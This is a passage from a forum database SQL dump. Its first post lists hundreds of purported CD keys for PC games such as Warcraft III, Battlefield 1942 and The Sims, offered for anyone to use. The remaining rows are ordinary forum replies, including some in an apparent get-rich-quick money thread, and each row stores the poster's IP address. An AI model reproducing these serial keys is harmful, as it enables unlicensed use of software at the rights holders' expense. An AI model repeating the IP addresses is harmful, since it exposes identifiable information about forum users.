Generals: Zero Hour Expansion[/b] [b]ULPF-ZEVK-FRWG-Q4YJ-6F2T[/b] [b]Y83K-CT4F-VL2X-4X4M-SW8X[/b] [b]2LMD-5MUD-UY2Y-SUU2-2UUQ[/b] [b]WVNN-XDK3-PZ6Q-PN42-W9G7[/b] [b]YM2S-PVC6-RL2T-UT89-SW8T[/b] [b]4EFF-YZNG-6AS4-3QJQ-44YG[/b] [b]QFYY-CEQT-J4G8-3UWQ-48UY[/b] [b]N3XF-MGW6-GLEE-8S2A-YASU[/b] [b]AZNE-P748-W8C4-SSWS-4E8S[/b] [b]87Z9-U64J-Y84U-QA6W-82NJ[/b] [b]QJ9H-W286-YVKX-VX6Z-KN7C[/b] [b]4BFF-9YWF-Q6SG-TLGU-CNC2[/b] [b]YHJS-GVKT-4U9Y-DUW4-5622[/b] [b]EL22-2W4Z-P45K-JUL7-CQYW[/b] [b]UN7P-G6SA-YAG4-4YL4-SG2W[/b] [b]------------[/b] [b]Rugby 2004:[/b] [b]PU2S-DTA3-TLMH-47CP-5PQH[/b] [b]PXMM-YCAW-TGKZ-4F75-HL6V[/b] [b]PWK3-GDA4-TXCB-VB8P-KCQB[/b] [b]P74L-JWA3-THBH-JVRE-VF5Z[/b] [b]PW7F-AYAG-TGF7-3J7V-NSXB[/b] [b]PD5V-Z5AW-TRXK-7U2H-DQHR[/b] [b]------------[/b] [b]Homeworld 2:[/b] [b]NAS3-DEC2-BYJ5-CUJ6-8385[/b] [b]------------[/b] [b]Nascar Thunder 2004 :[/b] [b]CLZH-PE48-R9RR-G9ZT-9DSW[/b] [b]1RKB-TB12-ZZ9R-ZLAU-0U0A[/b] [b]QKLL-JEIB-R119-3L4D-IIK3[/b] [b]ZXC4-YRZ9-1O1A-N8DU-RQ90[/b] [b]E7RR-PV4D-1ZR1-X5IL-ZFAW[/b] [b]MBE6-5JLH-9A11-2TSV-17WD[/b] [b]1BTT-R7CR-RA1R-SIWJ-Z592[/b] [b]H68G-8SGZ-1RZ9-Q8AN-NZ2R[/b] [b]------------[/b] [b]Battlefield 1942: Secret Weapons of WWII[/b] [b]2gyy-3wlk-8btf-wjur-g277[/b] [b]------------[/b] [b]Tron 2.0[/b] [b]9393-L9CN-PRTB-T7N4-5858[/b] [b]------------[/b] [b]Tony Hawk Pro Skater 4:[/b] [b]P4EPBTIQDAIH7WXM[/b] [b]------------[/b] [b]Madden NFL 2004:[/b] [b]VMZ9-JXRC-AZOR-J000-1911[/b] [b]0266-FF0M-6666-M666-6666[/b] [b]GW7P-A96J-4665-6454-6767[/b] [b]624L-CYGB-F46D-MG45-D6G4[/b] [b]------------[/b] [b]Hoyle Majestic Chess:[/b] [b]XYN6-NAB4-FES2-MUX7-3485[/b] [b]------------[/b] [b]Chaser:[/b] [b]52QJY-10K8V-CLNPI-1EISW-7VNP3[/b] [b]------------[/b] [b]F1 Challenge 99-02:[/b] [b]5093-3562421-9149309-1230[/b] [b]9001-8194913-5555300-6649[/b] [b]5696-3920619-9004669-1043[/b] [b]3039-9020019-1951603-0151[/b] [b]7598-0895367-4117659-0320[/b] [b]------------[/b] [b]Star Trek: Voyager Elite Force II[/b] [b]DEVI-ANCE-ISHE-RE!!-FFDE[/b] [b]Q6NJ-GS1Q-M5VE-5YXR-97BD[/b] [b]R9TI-4HHN-1MEF-LAIV-CDEB[/b] [b]W4JZ-W1R5-5KK3-IRS2-DCE7[/b] [b]M2QB-8UK5-HCGA-8UGL-0E2C[/b] [b]6RXS-GBSY-BJYG-99WR-A7A3[/b] [b]YD7X-YT2P-GFHC-CFST-6623[/b] [b]5ZTT-8GVX-LPJA-DBX2-7F68[/b] [b]QGHR-I2XS-R4B9-94XB-A562[/b] [b]IOWB-MVPW-9KH7-5YZA-E99A[/b] [b]------------[/b] [b]Warcraft III: Frozen Throne[/b] [b]VNM6K8-D24F-DV7JJJ-2DVM-9X9D9M[/b] [b]JN9YDG-WY7Z-XGEK4C-N6WB-CEGDG9[/b] [b]HH84GY-2CPR-EYB8MM-6VYV-C2P8P8[/b] [b]YF74K9-HZ2N-ZXK6CN-JCRV-9E6467[/b] [b]T4CH2G-E6BF-Y7WZ7Z-6BPK-PRM2MC[/b] [b]------------[/b] [b]Spy Hunter:[/b] [b]SHU3E7RVCCRBFHSS[/b] [b]------------[/b] [b]Tien:[/b] [b]KSW003-234403-373342-364267[/b] [b]KSW003-808343-147486-103467[/b] [b]KSW003-351467-324580-157236[/b] [b]KSW003-181748-350468-760972[/b] [b]KSW003-810607-663324-308548[/b] [b]KSW003-062688-348450-870938[/b] [b]KSW003-163206-615444-877087[/b] [b]KSW003-686451-784502-614557[/b] [b]KSW003-542465-235481-001066[/b] [b]KSW003-632553-850453-715567[/b] [b]------------[/b] [b]1503 A.D. The New World:[/b] [b]0705-7933859-6725970-0015[/b] [b]4674-0728030-1210467-5142[/b] [b]0163-3628552-7474216-1618[/b] [b]9543-9977522-5363454-0014[/b] [b]2484-9264724-5725148-0845[/b] [b]MVP Baseball 2003:[/b] [b]CQ7C80574479*94F[/b] [b]CQ7C85215498*945[/b] [b]CQ7C80055454*935[/b] [b]CQ7C85785435*9C6[/b] [b]CQ7C80526433*953[/b] [b]CQ7C85266435*939[/b] [b]CQ7C86096418*9DA[/b] [b]CQ7C81827437*9D6[/b] [b]CQ7C86567439*93C[/b] [b]CQ7C81308473*94D[/b] [b]CQ7C86048471*94B[/b] [b]CQ7C85678431*92F[/b] [b]CQ7C80419450*93D[/b] [b]CQ7C85159494*935[/b] [b]------------[/b] [b]Galactic Civilizations:[/b] [b]DN-500792-GC1-CLS4FLT8XT[/b] [b]------------[/b] [b]Delta Force: Black Hawk Down:[/b] [b]QZP3-EPZW-SP5N-2XEX-H7JG[/b] [b]------------[/b] [b]Deep Sjeng:[/b] [b]BFAE79BD-AA205929-6B70F982-9F4CE0F1[/b] [b]------------[/b] [b]IGI-2: Covert Strike[/b] [b]031f-f8d0-6536-b510[/b] [b]1320-615d-ba73-52ec[/b] [b]------------[/b] [b]Nascar Racing Season 2003:[/b] [b]RAB2-RAB2-RAB2-RAB2-8869[/b] [b]Command and Conquer Generals:[/b] [b]4963-7882913-5984076-0674[/b] [b]5412-0014607-1777733-1746[/b] [b]3496-5109968-3484992-5863[/b] [b]5533-3743808-8068198-3235[/b] [b]9722-8289078-1586124-6505[/b] [b]2586-2653924-6182119-3319[/b] [b]7629-5200391-8195325-2636[/b] [b]2586-7722941-9698255-2218[/b] [b]4912-5083939-6799769-5962[/b] [b]------------[/b] [b]Sim City 4:[/b] [b]NCM4-RHYX-6QMX-DX4M[/b] [b]------------[/b] [b]James Bond 007: NightFire:[/b] [b]1740-9488245-5171152-5578[/b] [b]7614-2322168-5761892-1232[/b] [b]7954-3123341-1387427-6504[/b] [b]------------[/b] [b]Hegemonia: Legions of Iron[/b] [b]BAD0-DAD0-5000-8113[/b] [b]BAD9-DAD9-5001-A112[/b] [b]BAD8-DAD8-5002-8112[/b] [b]BAD7-DAD7-5003-6113[/b] [b]DEAD-1870-5004-4538[/b] [b]DEAD-1871-5005-7538[/b] [b]DEAD-1872-5006-6538[/b] [b]DEAD-1873-5007-953B[/b] [b]------------[/b] [b]Medal of Honor: Spearhead[/b] [b]5000-0000000-0000000-5039[/b] [b]------------[/b] [b]NBA Live 2003:[/b] [b]Q2EP-95B3-55E3-KKWZ[/b] [b]QJFX-YPCL-G2FL-249Q[/b] [b]G84A-YSUU-264U-BFHE[/b] [b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b] [b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b] [b]50,000 Cd Keys Of Pc Games[/b] [b][/b][/b] [b]O.R.B. :[/b] [b]JTRV74NVVKUJX7AM[/b] [b]------------[/b] [b]Star Trek: Starfleet Command III[/b] [b]0000-0000-0000-K28K[/b] [b]------------[/b] [b]Harry Potter: Chamber of Secrets[/b] [b]1501-0514490-6731402-3052[/b] [b]------------[/b] [b]Tiger Woods PGA Tour 2003[/b] [b]FLTR-O262-2292-1RV4[/b] [b]FLTR-O275-2254-1RTA[/b] [b]FLTR-O378-2235-1RKH[/b] [b]FLTR-O361-3294-1RT7[/b] [b]FLTR-O464-3296-1RV9[/b] [b]FLTR-O467-3233-1RSA[/b] [b]FLTR-O560-4242-1RUB[/b] [b]FLTR-O553-4282-1RU7[/b] [b]FLTR-O556-4263-1RVC[/b] [b]------------[/b] [b]Hot Pursuit 2:[/b] [b]S6UQ-SAT5-39U5-2VXF[/b] [b]D5P6-YQG4-CPP4-3FPJ[/b] [b]GT5J-USVG-GV5G-2QX6[/b] [b]------------[/b] [b]Fifa 2003:[/b] [b]DEVI-ANCE-RULE-ZF79[/b] [b]3133-7313-3731-3KGH[/b] [b]DEVI-ANCE-2002-XF7B[/b] [b]------------[/b] [b]Need For Speed: Hot Pursuit 2:[/b] [b]8249-7EE3-84EW-TXGT[/b] [b]------------[/b] [b]The Gladiators :[/b] [b]UK-9B4E-FFFF-F6FA-770C-BD42[/b] [b]UK-CE73-FFFF-8DBB-0407-D629[/b] [b]UK-E404-FFFF-D3F7-92D9-52AD[/b] [b]UK-822F-FFFF-7BAB-A591-21DE[/b] [b]UK-4DCF-FFFF-EAF4-E44A-C936[/b] [b]UK-9AF3-FFFF-B6DE-B3F2-916E[/b] [b]UK-0ED8-FFFF-8477-D6C7-7689[/b] [b]UK-4F79-FFFF-D9DC-B4B4-11EE[/b] [b]UK-D1D5-FFFF-49FA-F0D8-1BE4[/b] [b]UK-4818-FFFF-5A0E-203E-8E71[/b] [b]UK-2B3F-FFFF-A004-CAF5-1EE1[/b] [b]------------[/b] [b]Nascar Thunder 2003:[/b] [b]NASC-ARTH-UNDE-RJAM[/b] [b]FAIR-LIGH-TOWN-*MBD[/b] [b]CANT-CRAK-2810-*RS4[/b] [b]OWND-OWND-OWND-UXKV[/b] [b]NOLO-ADER-REQD-UFKD[/b] [b]PLAY-THEG-AME!-*DT3[/b] [b]ITSI-NTHE-GAME-*AJ9[/b] [b]DRIV-EINC-IRCL-E84X[/b] [b]FLTF-LTFL-TFLT-*RK5[/b] [b]NOSP-EEDO-HERE-*FAM[/b] [b]NOTR-AFFI-CCOP-SADQ[/b] [b]OHAN-OTHE-RGAM-E9KJ[/b] [b]CODE-CODE-CODE-*4C6[/b] [b]CARS-CARS-CARS-*E2C[/b] [b]NOSP-EEDB-UMPS-*F3L[/b] [b]CLS0-FLT1-RULE-15A9[/b] [b]------------[/b] [b]Age Of Mythology:[/b] [b]qvw83-4mc67-fdpth-49pt8-6hgrd[/b] [b]------------[/b] [b]NHL 2003:[/b] [b]VBD5-34BJ-Q103-K52Y[/b] [b]MQSA-XY1H-3BLE-FAM7[/b] [b]JNS9-009W-4H7A-SA3R[/b] [b]------------[/b] [b]Unreal Tournament 2003:[/b] [b]YBLMH-P8F3W-A3W6X-UEWJ6[/b] [b]KFYTK-RQE8Q-BBW96-AAM8F[/b] [b]YMTFR-BQFYE-A7BKL-2UC8Q[/b] [b]serial:LYR22-RZ743-A9D7T-CNNEN[/b] [b]------------[/b] [b]Earth 2150: Lost Souls[/b] [b]7XJC-UD2E-E83L-Z5T5[/b] [b]------------[/b] [b]Frontline Attack: War Over Europe[/b] [b]FUBP-EYNZ-KFXC-SKM2[/b] [b]------------[/b] [b]Empire Earth: The Art of Conquest[/b] [b]GER2-MAN2-RAP2-PER5-2252[/b] [b]------------[/b] [b]Battlefield 1942:[/b] [b]5000-0000000-0000000-1318[/b] [b]------------[/b] [b]Emperor: Rise of the Middle Kingdom[/b] [b]BAC9-RAL8-SAS2-SAX2-9999[/b] [b]RED2-DAD2-RAD2-DAD2-8888[/b] [b]BAB2-DAD2-BAB2-DAD4-2247[/b] [b]GAG2-FAF2-GAG2-FAF5-2257[/b] [b]BAB2-RAL2-BAB2-FAF5-2279[/b] [b]RAD2-RAL2-RAD2-FAF3-2289[/b] [b]RAD2-RAD2-RAD2-RAD2-2247[/b] [b]TAD2-TAD2-TAD2-TAD5-2253[/b] [b]BAD2-BAD2-BAD2-BAD4-2267[/b] [b]DAD2-MAC2-DAD2-MAC4-2269[/b] [b]GAD2-ZUC2-GAD2-ZUC3-2225[/b] [b]RED2-MAC2-RED2-BAD2-2269[/b] [b]RED2-DED2-RED2-DED5-2228[/b] [b]BUG2-GER2-MAD2-BAT3-2236[/b] [b]BUG2-GER2-MAT2-MAD3-2289[/b] [b]BUG2-GER2-GER2-MAN2-2284[/b] [b]BAD2-GER2-BUG2-GER2-2286[/b] [b]BAD2-GER2-MAN2-MAN3-2236[/b] [b]RUG2-GER2-MAN2-MAN5-2277[/b] [b]RED2-RAG2-RAG2-RED2-2288[/b] [b]BED2-NAP2-NAP2-BED3-2279[/b] [b]NAP2-PED2-CAT2-NAP5-2289[/b] [b]RAP2-PER2-BAD2-CAT2-2238[/b] [b]BAD2-MAG2-SAD2-FAG3-2269[/b] [b]------------[/b] [b]Rally Trophy:[/b] [b]6204-a39b-03f3-68d1[/b] [b]------------[/b] [b]Operation Flashpoint: Resistance Addon[/b] [b]BS0P NEKED 838CB NNP3X 183F3[/b] [b]HFX2 FX7FL XNW7Z 2C7SV VH9XH[/b] [b]DFE6 S2VB8 DZAV8 4WHGY LTHJ4[/b] [b]------------[/b] [b]Delta Force: Task Force Dagger[/b] [b]72YL-R4SB-GKG6-3WKS-HQ27[/b] [b]------------[/b] [b]Cricket 2002:[/b] [b]4792-1088041-9269636-4601[/b] [b]------------[/b] [b]The Fate:[/b] [b]68CD687-E8449C5B-E8I388AC48[/b] [b]------------[/b] [b]Neverwinter Nights:[/b] [b]CH37D-QXPRX-34U7F-9FL3N-QLKTC-CFGCT-3J9DG[/b] [b]3QJ9A-EJMW9-CR7UE-64D9Q-J9KKE-FDKDR-U3DQ3[/b] [b]YTKH9-MYLJX-X77RJ-KFMXF-Y9XQ9-39NVV-C4VU9[/b] [b]------------[/b] [b]Return to Castle Wolfenstein:Game of the Year Edition[/b] [b]SL3H-SSPG-B3JL-LPCC-A5[/b] [b]------------[/b] [b]MechWarrior 4: Inner Sphere Mech Pak[/b] [b]gf8tg-t6gtt-h667t-p9qg7-67bcw[/b] [b]------------[/b] [b]Warcraft III:[/b] [b]1JEPYU-ZIOF-WTQH40-CDBK-1VLJTH[/b] [b]35M7SW-NB42-I96B78-CBAE-0D211S[/b] [b]BVDO9C-A65T-0Z34R7-C4E1-2PXMYE[/b] [b]------------[/b] [b]Gore:[/b] [b]5FFE-62A6-BE89-C15B[/b] [b]6FF8-0772-FC04-237F[/b] [b]6FF9-0437-8FA9-9874[/b] [b]------------[/b] [b]Team Factor:[/b] [b]DCAZ7ZZ-9DBFDU1[/b] [b]YPZY8C3-9D538FE[/b] [b]6WPRRYN-R3PYRWP[/b] [b]------------[/b] [b]Soldier Of Fortune II Double Helix :[/b] [b]MTKW-FTMK-EMFE-W3P3-B7[/b] [b]------------[/b] [b]Global Operations:[/b] [b]5501-0000000-0000000-4549[/b] [b]8427-5179437-7505878-5806[/b] [b]5000-0000000-0000000-5021[/b] [b]------------[/b] [b]Aquanox:[/b] [b]7111-02a1-db82-0b06[/b] [b]3111-3982-49d0-1eb3[/b] [b]5111-39d9-b3e7-8819[/b] [b]------------[/b] [b]Triple Play Baseball 2002:[/b] [b]0204-3939889-8825252-2002[/b] [b]2500-7240579-3830751-5535[/b] [b]------------[/b] [b]Three Kingdoms 2:[/b] [b]00724-60871-24289-09053[/b] [b]00730-00504-53989-89682[/b] [b]------------[/b] [b]Simcity 3000 :[/b] [b]2001-5076965-7787848-3962[/b] [b]2001-9345001-2906628-6166[/b] [b]2001-0047391-0117848-2719[/b] [b]------------[/b] [b]Star Craft: Brood War[/b] [b]3423-72091-2107[/b] [b]3423-72093-2758[/b] [b]3423-73086-2128[/b] [b]------------[/b] [b]Star Craft:[/b] [b]2602-89590-6961[/b] [b]2602-94589-6970[/b] [b]2603-28588-6845[/b] [b]------------[/b] [b]F1 2001 :[/b] [b]4502-9028156-8500964-3534[/b] [b]------------[/b] [b]Maddog 2000 :[/b] [b]6754-IPZZ4XY[/b] [b]------------[/b] [b]The Settlers IV:[/b] [b]1576-5655-2355-6565[/b] [b]------------[/b] [b]Legends of Might & Magic:[/b] [b]2b09-24c6-9894-c18f[/b] [b]------------[/b] [b]Angel :[/b] [b]ATT-0948-812[/b] [b]------------[/b] [b]Nox :[/b] [b]017934-718048-114782-5775[/b] [b]------------[/b] [b]Kingdom Under Fire:[/b] [b]A1AH-CQFA-T0LE-LVK3[/b] [b]------------[/b] [b]The Typing of the Dead :[/b] [b]TDK02200-176403-17407[/b] [b]------------[/b] [b]The Settlers 3 :[/b] [b]3416-3922-3505-3216-1252[/b] [b]------------[/b] [b]Sega GT:[/b] [b]GTJ08010-322007-01723[/b] [b]------------[/b] [b]NBA Live 2001:[/b] [b]2001-0020601-0010978-6694[/b] [b]------------[/b] [b]Home World : Cata Ciysm[/b] [b]GAF6-CAB4-SEX5-ZYL6-2622[/b] [b]------------[/b] [b]Ultimate Hunt :[/b] [b]14067 CHOW VATS SLAP CLAY[/b] [b]------------[/b] [b]Sacrifice :[/b] [b]29NF-WJTL-7OIZ-NYRS[/b] [b]------------[/b] [b]Rich5 :[/b] [b]GB:6ef9d-33rut49ei6-dd8rt[/b] [b]Big:5J02MF-2J9UM-I1FHA[/b] [b]------------[/b] [b]Lunatic IV :[/b] [b]281-EBE02-93E-BF9A1[/b] [b]------------[/b] [b]Black & White:[/b] [b]0901-3324366-4702210-2081[/b] [b]------------[/b] [b]The Sims : House Party[/b] [b]0901 4177371 2064872 3510[/b] [b]------------[/b] [b]SimCoaster:[/b] [b]2001-0013101-0010978-2823[/b] [b]------------[/b] [b]The Sims Livin\' Large:[/b] [b]2500-5149691-2267453-0556[/b] [b]------------[/b] [b]Kohan: Immortal Sovereigns[/b] [b]6bd9-9a56-bc85-455a[/b] [b]------------[/b] [b]Real Air Traffic Controller 2[/b] [b]044-0800-23000007152226[/b] [b]------------[/b] [b]Deep Space Nine Dominion Wars :[/b] [b]1000-7064[/b] [b]------------[/b] [b]Outlive:[/b] [b]c61e41-a3f465-4674c1-ace71f[/b] [b]------------[/b] [b]Nascar Racing 4 :[/b] [b]GAC7-REB8-TUX6-DAC2-7833[/b] [b]------------[/b] [b]Adventure Pinball: Forgotten Island[/b] [b]0901-3066676-3327010-9227[/b] [b]------------[/b] [b]Elite Force Expansion Pack :[/b] [b]4008-b491-1dc3-0f6c[/b] [b]------------[/b] [b]Star Trek Starfleet Command 2 Empires at War:[/b] [b]RYS8-LAB4-JEF8-BYM3-4652[/b] [b]------------[/b] [b]Orion Pirates:[/b] [b]70b2-b6c7-28c5-0c4a[/b] [b]------------[/b] [b]Gunman Chronicles :[/b] [b]2609-57245-0368[/b] [b]------------[/b] [b]Quake 3: Team Arena[/b] [b]TSBH-7CCG-DPWP-B2LT-84[/b] [b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b] [b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b] [b]50,000 Cd Keys Of Pc Games[/b] [b][/b][/b] [b]The Typing of the Dead:[/b] [b]TDK02200-176403-17407[/b] [b]------------[/b] [b]Tiger Woods PGA Tour 2001:[/b] [b]1500-3202255-2068109-2932[/b] [b]------------[/b] [b]Superbikes 2001:[/b] [b]1500-4288423-2982915-3163[/b] [b]------------[/b] [b]American McGee\'s Alice:[/b] [b]2500-5248097-9624846-2118[/b] [b]------------[/b] [b]Half-Life: Opposing Force[/b] [b]DYP6-MYL8-GYG4-BET3-6283[/b] [b]------------[/b] [b]Sub Command Seawolf Akula:[/b] [b]0901-1315206-2102812-3248[/b] [b]------------[/b] [b]FA Premier League Manager 2002 :[/b] [b]4507-1863659-3033569-5650[/b] [b]------------[/b] [b]Madden NFL 2002:[/b] [b]0901-5445152-2745753-4827[/b] [b]1500-6610360-1643530-0243[/b] [b]------------[/b] [b]NHL 2002 :[/b] [b]1000-2003004-0000000-4904[/b] [b]------------[/b] [b]Throne of Darkness :[/b] [b]RAC2-RAD2-RAC2-RAC2-3387[/b] [b]------------[/b] [b]Come On Baby :[/b] [b]8004-8846-7038-2877[/b] [b]------------[/b] [b]Delta Force: Land Warrior[/b] [b]N5E3-YXH2-G983-9WYB-B3ZS[/b] [b]------------[/b] [b]Soldier Of Fortune II Double Helix *BETA* :[/b] [b]3Z4J - J3PP - K848 - EWPK - 1F[/b] [b]------------[/b] [b]Zax The Alien Hunter :[/b] [b]0000-2059-5800-0000-0001[/b] [b]0000-2714-9300-0000-0001[/b] [b]0000-3370-2800-0000-0001[/b] [b]0000-4025-6300-0000-0001[/b] [b]0000-4680-9800-0000-0001[/b] [b]0081-2072-1800-0000-0001[/b] [b]0081-2727-5300-0000-0001[/b] [b]0081-3382-8800-0000-0001[/b] [b]0359-9972-0400-0000-0001[/b] [b]0360-0627-3900-0000-0001[/b] [b]0360-1282-7400-0000-0001[/b] [b]0360-1938-0900-0000-0001[/b] [b]0392-7647-0400-0000-0001[/b] [b]0392-8302-3900-0000-0001[/b] [b]0392-8957-7400-0000-0001[/b] [b]0392-9613-0900-0000-0001[/b] [b]0393-0268-4400-0000-0001[/b] [b]0393-0923-7900-0000-0001[/b] [b]------------[/b] [b]Mr Driller :[/b] [b]ALC3-E4NW-2CY3-2WLE[/b] [b]------------[/b] [b]Red Alert 2:[/b] [b]030676-380249-256222-9234[/b] [b]030656-018225-019382-0579[/b] [b]------------[/b] [b]Shogun:Total War[/b] [b]1600-0052410-0052410-6424[/b] [b]------------[/b] [b]Emperor: Battle for Dune[/b] [b]036642-256734-246754-5204[/b] [b]------------[/b] [b]Dark Reign 2:[/b] [b]gad6-teb4-cup9-pap6-5529[/b] [b]------------[/b] [b]Vampire: The Masquerade[/b] [b]RAC2-SAL2-GAT3-RAD3-6545[/b] [b]------------[/b] [b]Soldier Of Fortune:[/b] [b]ben2-bac7-buz6-jad3-9742[/b] [b]------------[/b] [b]The Sims:[/b] [b]100486-585530-905808-0928[/b] [b]------------[/b] [b]FIFA World Cup 2002 :[/b] [b]2500-2586941-6567281-4645[/b] [b]0901-3482564-1716312-0441[/b] [b]------------[/b] [b]Diablo II:[/b] [b]2V97-9DKN-F9HC-JCJE[/b] [b]4MTF-KW7R-CBR6-GPRE[/b] [b]KWDN-H67J-B8GB-FDD6[/b] [b]------------[/b] [b]Diablo II: Lord of Destruction[/b] [b]KTB9-N7BP-CR8N-49VX[/b] [b]4ENZ-N7BV-TKFD-J7NG[/b] [b]4EBC-4GCB-MV74-NHPB[/b] [b]------------[/b] [b]Half-Life: Counter Strike[/b] [b]1234-56789-0123[/b] [b]3496-74811-7825[/b] [b]5198-13905-4846[/b] [b]3697-24619-0806[/b] [b]------------[/b] [b]FIFA 2002 :[/b] [b]2501-2973603-4208783-4109[/b] [b]Age of Mythology: XDWXF-2JCVG-VTX6T-6KYQ9-QDC4G[/b] [b]Age of Mythology: RD4D4-B94XK-QVWFP-K9PJD-GVRV3[/b] [b]Age of Mythology: QVW83-4MC67-FDPTH-49PT8-6HGRD[/b] [b]Alien vs Predators 2: rec6-fab6-gen7-duf7-4344[/b] [b]American McGee\'s Alice: 2000-0112900-0010978-3379[/b] [b]American McGee\'s Alice: 6453-7884462-9832102-6449[/b] [b]Battlefield 1942: 0901-4486830-1635751-2230[/b] [b]Battlefield 1942: 0901-2857682-5631883-1206[/b] [b]Battlefield 1942: 0901-5424665-0520057-1232[/b] [b]Battlefield 1942: 5000-0000000-0000000-1318[/b] [b]Battlefield 1942 Road to Rome: 4906-9626506-2206381-5368[/b] [b]Battlefield 1942 Road to Rome: 8456-5984327-7540897-4330[/b] [b]Battlefield 1942 Road to Rome: 2256-2303935-1818093-2776[/b] [b]Battlefield 1942 Secret Weapons of WWII: 0901-0120062-1518273-2120[/b] [b]Battlefield 1942 Secret Weapons of WWII: 4509-4188686-4654577-0456[/b] [b]Big Scale Racing (ISO): 8060-7476-B821-5B42[/b] [b]Big Scale Racing (ISO): FC43-5961-5D24-B071[/b] [b]Big Scale Racing (ISO): 1EGO-E5AI-66SG-23AY[/b] [b]Big Scale Racing (ISO): 7DGE-64NI-94US-C201[/b] [b]Big Scale Racing (ISO): 7F34-7F78-56AB-8FEF[/b] [b]Black & White: 0901-3324366-4702210-2081[/b] [b]Black & White: 3609-8077379-3488008-4192[/b] [b]Black & White: 0239-3149551-0576661-5531[/b] [b]Black & White Creatures Isle: 2394-1529829-3567371-5124[/b] [b]Black & White Creatures Isle: 7655-0015767-1953964-2153[/b] [b]Black & White Creatures Isle: 3379-8714263-1181459-4465[/SPOILER]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8bab7563f013562cc2b2f8abd085e4bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5467', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '62', 'R?????zo?', '1350597491', 'I think android it\'s better even though I have iOS :p', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1db30f2640021266c7fc52eeb97bd430', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5468', '975', '5456', '7', 'RE: how do i insert a pic', '0', '228', 'VirtualLegend', '1350597533', 'Quick tutorial: 1. Upload Your Images at i.imgur.com (You don\'t have to make a account) 2. Than Click the image until the background is white 3. Than Copy the URL 4. Past it like this; [img]PAST LINK IN HERE[/img] And Tadaaaa Your Done', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'fd235492040e000f2b1483c24a9b3416', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5469', '971', '5465', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '62', 'R?????zo?', '1350597549', '[quote=\'VirtualLegend\' pid=\'5465\' dateline=\'1350597296\'] Nice Thread, Tip; Center it in the middle (Looks way more better ;) ) [/quote] Done :) thanks for the tip!', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c9c04b848c5f228ae005053b934e3dd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5470', '973', '5454', '19', 'RE: New HF Logo?', '0', '257', 'XxTREYZxX', '1350597574', 'wow thats not nice at all :O', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'bbac0cea497eb97b296dadc83fc33672', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5471', '976', '5459', '71', 'RE: Halo 4', '0', '62', 'R?????zo?', '1350597599', 'Looks promising, I\'d get it if I had an xbox :( I loved playing previous Halo\'s', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ffedc0ca33e7d4c4f33d5eac6e9fbe76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5472', '976', '5471', '71', 'RE: Halo 4', '0', '257', 'XxTREYZxX', '1350597704', '[quote=\'R?????zo?\' pid=\'5471\' dateline=\'1350597599\'] Looks promising, I\'d get it if I had an xbox :( I loved playing previous Halo\'s [/quote] yeah there not to bad aye :O', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '169fe6deb66f0158d783da6d7969cfda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5473', '975', '5456', '7', 'RE: how do i insert a pic', '0', '257', 'XxTREYZxX', '1350597880', 'thanks every one, i did it now i cant see my pic its just a whit rectangle with a little piece of paper on it fuuuuuuuuuuuuuuuuu', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '530e70c4bbb0ff0886260e4d7c0aa055', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5474', '971', '5449', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '257', 'XxTREYZxX', '1350597972', 'another great share keep up the good work:O', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'f90220cc1e74fc1a2c425c55a6928431', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, 